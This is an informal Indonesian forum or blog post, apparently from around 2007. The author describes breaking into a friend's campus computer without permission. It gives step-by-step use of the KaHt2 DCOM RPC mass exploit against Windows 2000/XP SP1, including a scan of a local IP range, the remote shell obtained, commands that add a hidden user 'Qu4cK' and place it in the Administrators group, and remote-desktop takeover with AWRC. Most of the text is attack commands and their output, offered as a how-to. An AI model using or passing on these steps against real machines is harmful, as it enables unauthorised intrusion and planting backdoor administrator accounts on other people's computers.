Baru - baru ini aku lagi ngisengin kompie temenku yang ada di kampus He...!!! (bagi yg merasa sori yeaach... Very Happy ). Sebenerna ini, maaf cuman iseng kok bukan na sok keminter n sok tau tapi ini mungkin bisa untuk pembelajaran bagi yg laen, disini aku mo berbagi ilmu yg sebenernya dah lama n basi sehh... dulu waktu perang dunia ke 2 (woi jangan ngelindur disiang bolong...) ku sempet baca di artikel Echo ezine Release 4 tentang Hacking pada windows 2000 - XP sp1 klo SP2 dah dipacth tuh.. dah ku coba kok. Ok ga' usah banyak Omong langsung aja yach...!!!

Tool yg digunakan :
-> kaht2 (win)
-> AWRC (Remote - Client)
-> Modal Nekat
-> klo bisa ditemani ma pacar ya biar semangat Laughing

* Kaht2
Masuk ke command prompt dan jalankan kaht2 seperti :
C:>kaht.exe

_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by [email protected]
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION Razz
________________________________________________
Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]
example: KaHt2.exe 192.168.0.0 192.168.255.255
NEW!: Macros Available in shell enviroment!!
Type !! for more info into a shell.

C:\> kaht 192.168.1.1 192.168.1.255 --> Tergantung jaringan yang ada


[+] Targets: 192.168.1.2-192.168.1.255 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 33478
[+] Scan In Progress...
- Connecting to 192.168.1.10
Sending Exploit to a [Win2k] Server...FAILED
- Connecting to 192.168.1.12
Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32> <-- OK kita sudah masuk pada komputer target (192.168.1.12)
C:\WINDOWS\system32>net user <-- melihat account yg ada pada komputer target
------------------------------------------------------------ --------
Administrator Guest Help Assistant
Jarkom Jarkom1 Jarkom2
SUPPORT_388945a0
The command completed successfully.

C:\WINDOWS\system32>net
net
The syntax of this command is:
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

C:\WINDOWS\system32>net user Qu4cK hello /add <-- memasukan login Qu4cK dan password hello pada komputer target
The command completed successfully.
C:\WINDOWS\system32>net user <-- kita liat apakah login Qu4cK udah ada ------------------------------------------------------------ -----
Administrator Guest Help Assistant
Jarkom Jarkom1 Jarkom2
Qu4cK SUPPORT_388945a0
The command completed successfully.

C:\WINDOWS\system32>net user Qu4cK
User name Qu4cK
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/28/2007 10:45AM
Password expires 8/10/2007 9:33 AM
Password changeable 6/28/2007 10:45AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.

OK login Qu4cK udah masuk di Komputer Target, Aduh ternyata kita cuman bisa login hanya sebagai user biasa sekarang kita masukan login Qu4cK sebagai groups Administrator

C:\WINDOWS\system32>net localgroup Administrators Qu4cK /add
The command completed successfully.

kita check sekali lagi apakah masih sebagai user biasa ato sudah berubah menjadi administrator.

C:\WINDOWS\system32>net user Qu4cK
User name Qu4cK
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/28/2007 10:45AM
Password expires 8/10/2007 9:33 AM
Password changeable 6/28/2007 10:45AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.

Bingo kita sekarang sudah menjadi administrator sekarang terserah Ente-ente pade mo ngapain tuh PC. Ups lupa masih belum selesai ya...
sekarang tinggal njalanin AWRC yg udah didapat (Cari via Google aja yaaa...) OK jalanin dulu AWRC nya kalo sudah masuk pada Program AWRC masukkan IP pada Field Remote Host selanjutnya masukkan User dan Password yang sudah kita buat pada Komputer target dan Click CONNECT .... Tunggu sampai layar pada AWRC berubah menjadi layar pada Target.

Mungkin sampai disini dulu ya... klo masih belum jelas bisa Mail gue aja.. Ok Thanks semua yg baca artikel ini dan komunitas Echo disitu saya banyak belajar.